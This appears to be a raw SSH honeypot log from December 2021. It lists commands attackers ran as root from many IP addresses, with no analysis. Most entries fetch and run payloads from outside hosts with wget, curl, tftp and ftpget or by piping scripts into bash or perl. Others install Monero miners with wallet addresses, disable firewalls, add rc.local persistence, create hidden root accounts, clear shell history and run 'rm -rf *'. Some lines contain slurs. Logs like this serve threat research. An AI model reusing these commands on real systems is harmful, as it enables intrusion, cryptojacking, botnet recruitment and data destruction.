chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig

From 122.233.107.9 1-Dec-2021 01:30:13 ssh2 root
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig

From 122.233.107.9 1-Dec-2021 01:32:02 ssh2 root
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig

From 122.233.107.9 1-Dec-2021 01:33:47 ssh2 root
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig

From 122.233.107.9 1-Dec-2021 01:35:33 ssh2 root
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig

From 222.186.133.160 1-Dec-2021 15:28:12 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.133.160:8090/cqqz;chmod 777 cqqz;./cqqz;echo "cd /tmp/">>/etc/rc.local;echo "./cqqz&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.133.160:8090/cqqz
chmod 777 cqqz
./cqqz
echo "cd /tmp/">>/etc/rc.local
echo "./cqqz
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 141.98.10.246 1-Dec-2021 17:28:56 ssh2 root
Exec pkill xmrig; curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s; pkill screen
pkill xmrig
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s
apt install dos2unix -y
yum install dos2unix -y
curl -O http://206.189.15.231/storytime/a
chmod 777 a
dos2unix a
./a
rm -rf a
history -c
pkill Xorg
pkill cnrig
pkill x86_64
pkill x86
pkill java
pkill python
pkill screen

From 179.43.187.37 1-Dec-2021 22:18:27 ssh2 root
Exec uname -a; hive-passwd presisdenthiveassos12q3; sudo pkill Xorg; sudo pkill x11vnc
uname -a
hive-passwd presisdenthiveassos12q3
sudo pkill Xorg
sudo pkill x11vnc

From 141.98.10.246 1-Dec-2021 22:33:43 ssh2 root
Exec pkill xmrig; curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA; apt install dos2unix -y; yum install dos2unix -y; curl -O http://206.189.15.231/storytime/a; chmod 777 a; dos2unix a; ./a; rm -rf a; history -c; pkill Xorg; pkill cnrig; pkill x86_64; pkill x86; pkill java; pkill python; pkill screen
pkill xmrig
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA
apt install dos2unix -y
yum install dos2unix -y
curl -O http://206.189.15.231/storytime/a
chmod 777 a
dos2unix a
./a
rm -rf a
history -c
pkill Xorg
pkill cnrig
pkill x86_64
pkill x86
pkill java
pkill python
pkill screen

From 193.105.134.45 2-Dec-2021 04:11:07 ssh2 root
apt install dos2unix -y
yum install dos2unix -y
curl -O http://206.189.15.231/storytime/a
chmod 777 a
dos2unix a
./a
rm -rf a
history -c
pkill Xorg
pkill cnrig
pkill x86_64
pkill x86
pkill java
pkill python
pkill screen

From 141.98.10.246 2-Dec-2021 04:15:55 ssh2 root
Exec pkill xmrig; curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s
pkill xmrig
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s
apt install dos2unix -y
yum install dos2unix -y
curl -O http://206.189.15.231/storytime/a
chmod 777 a
dos2unix a
./a
rm -rf a
history -c
pkill Xorg
pkill cnrig
pkill x86_64
pkill x86
pkill java
pkill python
pkill screen

From 107.189.10.234 2-Dec-2021 12:24:59 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://209.141.42.136/xx;chmod 777 xx;./xx;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://209.141.42.136/xx
chmod 777 xx
./xx

From 222.186.133.160 2-Dec-2021 15:57:07 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.133.160:8090/org;chmod 777 org;./org;echo "cd /tmp/">>/etc/rc.local;echo "./org&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.133.160:8090/org
chmod 777 org
./org
echo "cd /tmp/">>/etc/rc.local
echo "./org
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 119.62.4.69 2-Dec-2021 21:28:26 ssh2 root
Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s
uname -a
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s

From 104.248.85.104 2-Dec-2021 23:18:29 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://tigan.cf/sh; curl -O http://tigan.cf/sh; chmod 777 sh; sh sh; tftp tigan.cf -c get bins.sh; chmod 777 bins.sh; sh bins.sh; tftp -r .sh -g tigan.cf; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 tigan.cf .sh .sh; sh .sh; rm -rf sh bins.sh .sh .sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://tigan.cf/sh
curl -O http://tigan.cf/sh
chmod 777 sh
sh sh
tftp tigan.cf -c get bins.sh
chmod 777 bins.sh
sh bins.sh
tftp -r .sh -g tigan.cf
chmod 777 .sh
sh .sh
ftpget -v -u anonymous -p anonymous -P 21 tigan.cf .sh .sh
sh .sh
rm -rf sh bins.sh .sh .sh
rm -rf *
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://tigan.cf/sh; curl -O http://tigan.cf/sh; chmod 777 sh; sh sh; tftp tigan.cf -c get bins.sh; chmod 777 bins.sh; sh bins.sh; tftp -r .sh -g tigan.cf; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 tigan.cf .sh .sh; sh .sh; rm -rf sh bins.sh .sh .sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://tigan.cf/sh
curl -O http://tigan.cf/sh
chmod 777 sh
sh sh
tftp tigan.cf -c get bins.sh
chmod 777 bins.sh
sh bins.sh
tftp -r .sh -g tigan.cf
chmod 777 .sh
sh .sh
ftpget -v -u anonymous -p anonymous -P 21 tigan.cf .sh .sh
sh .sh
rm -rf sh bins.sh .sh .sh
rm -rf *

From 107.189.10.234 3-Dec-2021 03:54:10 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://107.189.10.234:8009/Linux2.6;chmod 777 Linux2.6;./Linux2.6;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://107.189.10.234:8009/Linux2.6
chmod 777 Linux2.6
./Linux2.6

From 209.141.42.136 3-Dec-2021 15:41:49 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://209.141.42.136/xx;chmod 777 xx;./xx;wget -c http://209.141.42.136/xxarm;chmod 777 xxarm;./xxarm;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://209.141.42.136/xx
chmod 777 xx
./xx
wget -c http://209.141.42.136/xxarm
chmod 777 xxarm
./xxarm

From 72.167.48.55 3-Dec-2021 18:17:31 ssh2 root
Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 4AXp4BAFuqCUNLJ3X12FKg7jp9MQjiMeWG1bMme9znFNPvhP2LqGXUF5pEfaeMQ7FAArXVWnUAEEMF2Kms6xzjMGVagomWr
uname -a
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 4AXp4BAFuqCUNLJ3X12FKg7jp9MQjiMeWG1bMme9znFNPvhP2LqGXUF5pEfaeMQ7FAArXVWnUAEEMF2Kms6xzjMGVagomWr

From 209.141.42.136 4-Dec-2021 10:28:23 ssh2 root
Exec cd /tmp;wget http://xia.ddcch4ckserver.top/sysg64.sh;curl -O http://xia.ddcch4ckserver.top/sysg64.sh;chmod 777 sysg64.sh;sh sysg64.sh;
cd /tmp
wget http://xia.ddcch4ckserver.top/sysg64.sh
curl -O http://xia.ddcch4ckserver.top/sysg64.sh
chmod 777 sysg64.sh
sh sysg64.sh
Exec cd /tmp;wget http://xia.ddcch4ckserver.top/sysg64.sh;curl -O http://xia.ddcch4ckserver.top/sysg64.sh;chmod 777 sysg64.sh;sh sysg64.sh;
cd /tmp
wget http://xia.ddcch4ckserver.top/sysg64.sh
curl -O http://xia.ddcch4ckserver.top/sysg64.sh
chmod 777 sysg64.sh
sh sysg64.sh

From 34.142.116.47 5-Dec-2021 10:02:06 ssh2 root
Exec cd /tmp  cd /var/run  cd /mnt  cd /root  cd /; wget http://198.46.148.130/wget.sh; curl -O http://198.46.148.130/wget.sh; chmod 777 wget.sh; sh wget.sh; tftp 198.46.148.130 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 198.46.148.130; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 198.46.148.130 ftp.sh ftp.sh; sh ftp.sh; rm -rf wget.sh tftp1.sh tftp2.sh ftp.sh; rm -rf *
cd /tmp cd /var/run cd /mnt cd /root cd /
wget http://198.46.148.130/wget.sh
curl -O http://198.46.148.130/wget.sh
chmod 777 wget.sh
sh wget.sh
tftp 198.46.148.130 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 198.46.148.130
chmod 777 tftp2.sh
sh tftp2.sh
ftpget -v -u anonymous -p anonymous -P 21 198.46.148.130 ftp.sh ftp.sh
sh ftp.sh
rm -rf wget.sh tftp1.sh tftp2.sh ftp.sh
rm -rf *

From 213.233.110.162 6-Dec-2021 04:44:18 ssh2 root
w
lscpu
wget fuckyourfuckingshittymommaiknowyouareveryfuckingfrustratedISNTit?ashoole
exit

From 34.76.161.145 6-Dec-2021 10:58:20 ssh2 root
Exec cd /tmp  cd /var/run  cd /mnt  cd /root  cd /; wget http://198.46.148.130/wget.sh; curl -O http://198.46.148.130/wget.sh; chmod 777 wget.sh; sh wget.sh; tftp 198.46.148.130 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 198.46.148.130; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 198.46.148.130 ftp.sh ftp.sh; sh ftp.sh; rm -rf wget.sh tftp1.sh tftp2.sh ftp.sh; rm -rf *
cd /tmp cd /var/run cd /mnt cd /root cd /
wget http://198.46.148.130/wget.sh
curl -O http://198.46.148.130/wget.sh
chmod 777 wget.sh
sh wget.sh
tftp 198.46.148.130 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 198.46.148.130
chmod 777 tftp2.sh
sh tftp2.sh
ftpget -v -u anonymous -p anonymous -P 21 198.46.148.130 ftp.sh ftp.sh
sh ftp.sh
rm -rf wget.sh tftp1.sh tftp2.sh ftp.sh
rm -rf *

From 59.57.13.243 6-Dec-2021 20:39:39 ssh2 root
Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://212.71.238.141/stx.sh | LC_ALL=en_US.UTF-8 bash -s 4AXp4BAFuqCUNLJ3X12FKg7jp9MQjiMeWG1bMme9znFNPvhP2LqGXUF5pEfaeMQ7FAArXVWnUAEEMF2Kms6xzjMGVagomWr
uname -a
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://212.71.238.141/stx.sh | LC_ALL=en_US.UTF-8 bash -s 4AXp4BAFuqCUNLJ3X12FKg7jp9MQjiMeWG1bMme9znFNPvhP2LqGXUF5pEfaeMQ7FAArXVWnUAEEMF2Kms6xzjMGVagomWr
Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://212.71.238.141/stx.sh | LC_ALL=en_US.UTF-8 bash -s 4AXp4BAFuqCUNLJ3X12FKg7jp9MQjiMeWG1bMme9znFNPvhP2LqGXUF5pEfaeMQ7FAArXVWnUAEEMF2Kms6xzjMGVagomWr
uname -a
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://212.71.238.141/stx.sh | LC_ALL=en_US.UTF-8 bash -s 4AXp4BAFuqCUNLJ3X12FKg7jp9MQjiMeWG1bMme9znFNPvhP2LqGXUF5pEfaeMQ7FAArXVWnUAEEMF2Kms6xzjMGVagomWr

From 59.57.13.243 6-Dec-2021 20:42:06 ssh2 root
Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://212.71.238.141/stx.sh | LC_ALL=en_US.UTF-8 bash -s 4AXp4BAFuqCUNLJ3X12FKg7jp9MQjiMeWG1bMme9znFNPvhP2LqGXUF5pEfaeMQ7FAArXVWnUAEEMF2Kms6xzjMGVagomWr
uname -a
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://212.71.238.141/stx.sh | LC_ALL=en_US.UTF-8 bash -s 4AXp4BAFuqCUNLJ3X12FKg7jp9MQjiMeWG1bMme9znFNPvhP2LqGXUF5pEfaeMQ7FAArXVWnUAEEMF2Kms6xzjMGVagomWr

From 34.65.49.224 7-Dec-2021 02:07:04 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://130.162.32.102/sora.sh; curl -O http://130.162.32.102/sora.sh; chmod 777 sora.sh; sh sora.sh; tftp 130.162.32.102 -c get sora.sh; chmod 777 sora.sh; sh sora.sh; tftp -r sora2.sh -g 130.162.32.102; chmod 777 sora2.sh; sh sora2.sh; ftpget -v -u anonymous -p anonymous -P 21 130.162.32.102 sora1.sh sora1.sh; sh sora1.sh; rm -rf sora.sh sora.sh sora2.sh sora1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://130.162.32.102/sora.sh
curl -O http://130.162.32.102/sora.sh
chmod 777 sora.sh
sh sora.sh
tftp 130.162.32.102 -c get sora.sh
chmod 777 sora.sh
sh sora.sh
tftp -r sora2.sh -g 130.162.32.102
chmod 777 sora2.sh
sh sora2.sh
ftpget -v -u anonymous -p anonymous -P 21 130.162.32.102 sora1.sh sora1.sh
sh sora1.sh
rm -rf sora.sh sora.sh sora2.sh sora1.sh
rm -rf *

From 34.159.156.34 7-Dec-2021 03:50:33 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://130.162.32.102/sora.sh; curl -O http://130.162.32.102/sora.sh; chmod 777 sora.sh; sh sora.sh; tftp 130.162.32.102 -c get sora.sh; chmod 777 sora.sh; sh sora.sh; tftp -r sora2.sh -g 130.162.32.102; chmod 777 sora2.sh; sh sora2.sh; ftpget -v -u anonymous -p anonymous -P 21 130.162.32.102 sora1.sh sora1.sh; sh sora1.sh; rm -rf sora.sh sora.sh sora2.sh sora1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://130.162.32.102/sora.sh
curl -O http://130.162.32.102/sora.sh
chmod 777 sora.sh
sh sora.sh
tftp 130.162.32.102 -c get sora.sh
chmod 777 sora.sh
sh sora.sh
tftp -r sora2.sh -g 130.162.32.102
chmod 777 sora2.sh
sh sora2.sh
ftpget -v -u anonymous -p anonymous -P 21 130.162.32.102 sora1.sh sora1.sh
sh sora1.sh
rm -rf sora.sh sora.sh sora2.sh sora1.sh
rm -rf *

From 141.98.10.246 7-Dec-2021 05:00:34 ssh2 root
Exec pkill xmrig; curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s
pkill xmrig
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s

From 141.98.10.246 7-Dec-2021 05:02:30 ssh2 root
Exec pkill xmrig; curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s
pkill xmrig
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s
apt install dos2unix -y
yum install dos2unix -y
curl -O http://141.98.10.246/storytime/a
chmod 777 a
dos2unix a
./a
rm -rf a
history -c
pkill Xorg
pkill cnrig
pkill x86_64
pkill x86
pkill java
pkill python
pkill screen

From 141.98.10.246 7-Dec-2021 11:10:00 ssh2 root
Exec pkill xmrig; curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s; pkill screen
pkill xmrig
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s

From 45.61.186.166 7-Dec-2021 11:10:01 ssh2 root
apt install dos2unix -y
yum install dos2unix -y
curl -O http://141.98.10.246/storytime/a
chmod 777 a
dos2unix a
./a
rm -rf a
history -c
pkill Xorg
pkill cnrig
pkill x86_64
pkill x86
pkill java
pkill python
pkill screen

From 103.78.154.20 7-Dec-2021 13:45:09 ssh2 root
Exec echo -en "\\x31\\x33\\x33\\x37"
echo -en "\\x31\\x33\\x33\\x37"

From 205.185.114.149 7-Dec-2021 23:22:51 ssh2 root
Exec rm x86_64; wget http://205.185.121.185/x86_64; chmod 777 *; ./x86_64 nigga; rm x86_64
rm x86_64
wget http://205.185.121.185/x86_64
chmod 777 *
./x86_64 nigga
rm x86_64

From 222.186.133.160 8-Dec-2021 15:10:41 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.133.160:8090/maaz;chmod 777 maaz;./maaz;echo "cd /tmp/">>/etc/rc.local;echo "./maaz&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.133.160:8090/maaz
chmod 777 maaz
./maaz
echo "cd /tmp/">>/etc/rc.local
echo "./maaz
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 141.98.10.246 9-Dec-2021 03:12:40 ssh2 root
Exec pkill xmrig; curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s; pkill screen
pkill xmrig
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s
apt install dos2unix -y
yum install dos2unix -y
curl -O http://141.98.10.246/storytime/a
chmod 777 a
dos2unix a
./a
rm -rf a
history -c
pkill Xorg
pkill cnrig
pkill x86_64
pkill x86
pkill java
pkill python
pkill screen

From 136.144.41.139 9-Dec-2021 03:46:49 ssh2 root
Exec curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 45dNkjTQGgT77r9AEMyHdCGan5tpuekXaHFhFW99dQ8hUS35oZQEYXddFE52jxVdfUNrAD4ZyZ44BgHfgk5SjHdoLjGdJnQ
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 45dNkjTQGgT77r9AEMyHdCGan5tpuekXaHFhFW99dQ8hUS35oZQEYXddFE52jxVdfUNrAD4ZyZ44BgHfgk5SjHdoLjGdJnQ

From 141.98.10.246 9-Dec-2021 07:02:23 ssh2 root
Exec pkill xmrig; curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA; apt install dos2unix -y; yum install dos2unix -y; curl -O http://141.98.10.246/storytime/a; chmod 777 a; dos2unix a; ./a; rm -rf a; history -c; pkill Xorg; pkill cnrig; pkill x86_64; pkill x86; pkill java; pkill python; pkill screen
pkill xmrig
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA
apt install dos2unix -y
yum install dos2unix -y
curl -O http://141.98.10.246/storytime/a
chmod 777 a
dos2unix a
./a
rm -rf a
history -c
pkill Xorg
pkill cnrig
pkill x86_64
pkill x86
pkill java
pkill python
pkill screen

From 5.196.239.157 10-Dec-2021 14:40:41 ssh2 root
Exec lscpu
lscpu

From 178.128.209.47 11-Dec-2021 09:01:57 ssh2 root
Exec (cd /tmp; wget -qO - 199.192.19.108:2202/oo|perl; curl -s 199.192.19.108:2202/oo|perl > /dev/null)
(cd /tmp
wget -qO - 199.192.19.108:2202/oo|perl
curl -s 199.192.19.108:2202/oo|perl > /dev/null)

From 137.220.194.61 12-Dec-2021 16:10:38 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://137.220.194.61/dos64;curl -O http://137.220.194.61/dos64;chmod 777 dos64;./dos64;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://137.220.194.61/dos64
curl -O http://137.220.194.61/dos64
chmod 777 dos64
./dos64

From 196.28.245.102 12-Dec-2021 16:32:49 ssh2 root
ls
w
free -g

From 90.223.103.4 12-Dec-2021 16:33:19 ssh2 root
free -g
/usr/sbin/useradd -o -u 0 -g 0 r00t -p admin1234
/usr/sbin/useradd -o -u 0 -g 0 .test -p admin1234 passwd root
passwd r00t
passwd .test
paswd
curl -O http://130.0.164.120/iscan.jpg

From 188.166.60.8 12-Dec-2021 22:13:43 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://tigan.cf/sh; curl -O http://tigan.cf/sh; chmod 777 sh; sh sh; tftp tigan.cf -c get bins.sh; chmod 777 bins.sh; sh bins.sh; tftp -r .sh -g tigan.cf; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 tigan.cf .sh .sh; sh .sh; rm -rf sh bins.sh .sh .sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://tigan.cf/sh
curl -O http://tigan.cf/sh
chmod 777 sh
sh sh
tftp tigan.cf -c get bins.sh
chmod 777 bins.sh
sh bins.sh
tftp -r .sh -g tigan.cf
chmod 777 .sh
sh .sh
ftpget -v -u anonymous -p anonymous -P 21 tigan.cf .sh .sh
sh .sh
rm -rf sh bins.sh .sh .sh
rm -rf *

From 188.166.60.8 12-Dec-2021 23:42:27 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://tigan.cf/sh; curl -O http://tigan.cf/sh; chmod 777 sh; sh sh; tftp tigan.cf -c get bins.sh; chmod 777 bins.sh; sh bins.sh; tftp -r .sh -g tigan.cf; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 tigan.cf .sh .sh; sh .sh; rm -rf sh bins.sh .sh .sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://tigan.cf/sh
curl -O http://tigan.cf/sh
chmod 777 sh
sh sh
tftp tigan.cf -c get bins.sh
chmod 777 bins.sh
sh bins.sh
tftp -r .sh -g tigan.cf
chmod 777 .sh
sh .sh
ftpget -v -u anonymous -p anonymous -P 21 tigan.cf .sh .sh
sh .sh
rm -rf sh bins.sh .sh .sh
rm -rf *

From 137.220.194.61 13-Dec-2021 01:23:56 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -chttp://137.220.194.61/dos64;curl -O http://137.220.194.61/dos64;chmod 777 dos64;./dos64;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -chttp://137.220.194.61/dos64
curl -O http://137.220.194.61/dos64
chmod 777 dos64
./dos64
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -chttp://137.220.194.61/dos64;curl -O http://137.220.194.61/dos64;chmod 777 dos64;./dos64;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -chttp://137.220.194.61/dos64
curl -O http://137.220.194.61/dos64
chmod 777 dos64
./dos64

From 107.189.30.134 13-Dec-2021 21:54:25 ssh2 root
Exec rm -rf x86*; wget http://205.185.121.185/x86_64; chmod 777 *; ./x86_64 nigga; rm -rf ~/c3pool; pkill xmrig; pkill xmr; pkill cnrig; cd /tmp; wget http://107.189.30.134/cnrig; chmod 777 cnrig; wget http://107.189.30.134/config.json; chmod 777 config.json; ./cnrig
rm -rf x86*
wget http://205.185.121.185/x86_64
chmod 777 *
./x86_64 nigga
rm -rf ~/c3pool
pkill xmrig
pkill xmr
pkill cnrig
cd /tmp
wget http://107.189.30.134/cnrig
chmod 777 cnrig
wget http://107.189.30.134/config.json
chmod 777 config.json
./cnrig

From 107.189.30.134 15-Dec-2021 02:28:41 ssh2 root
Exec rm -rf x86*; wget http://205.185.121.185/x86_64; chmod 777 *; ./x86_64 nigga; rm -rf ~/c3pool; pkill xmrig; pkill xmr; pkill cnrig; cd /tmp; wget http://107.189.30.134/cnrig; chmod 777 cnrig; wget http://107.189.30.134/config.json; chmod 777 config.json; ./cnrig
rm -rf x86*
wget http://205.185.121.185/x86_64
chmod 777 *
./x86_64 nigga
rm -rf ~/c3pool
pkill xmrig
pkill xmr
pkill cnrig
cd /tmp
wget http://107.189.30.134/cnrig
chmod 777 cnrig
wget http://107.189.30.134/config.json
chmod 777 config.json
./cnrig

From 222.186.133.160 15-Dec-2021 10:04:04 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.133.160:8090/maaz;chmod 777 maaz;./maaz;echo "cd /tmp/">>/etc/rc.local;echo "./maaz&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.133.160:8090/maaz
chmod 777 maaz
./maaz
echo "cd /tmp/">>/etc/rc.local
echo "./maaz
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.133.160:8090/maaz;chmod 777 maaz;./maaz;echo "cd /tmp/">>/etc/rc.local;echo "./maaz&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.133.160:8090/maaz
chmod 777 maaz
./maaz
echo "cd /tmp/">>/etc/rc.local
echo "./maaz
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 45.207.43.129 16-Dec-2021 04:47:52 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://45.207.43.129:8003/Linux2.6;chmod 777 Linux2.6;./Linux2.6;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://45.207.43.129:8003/Linux2.6
chmod 777 Linux2.6
./Linux2.6
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://45.207.43.129:8003/Linux2.6;chmod 777 Linux2.6;./Linux2.6;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
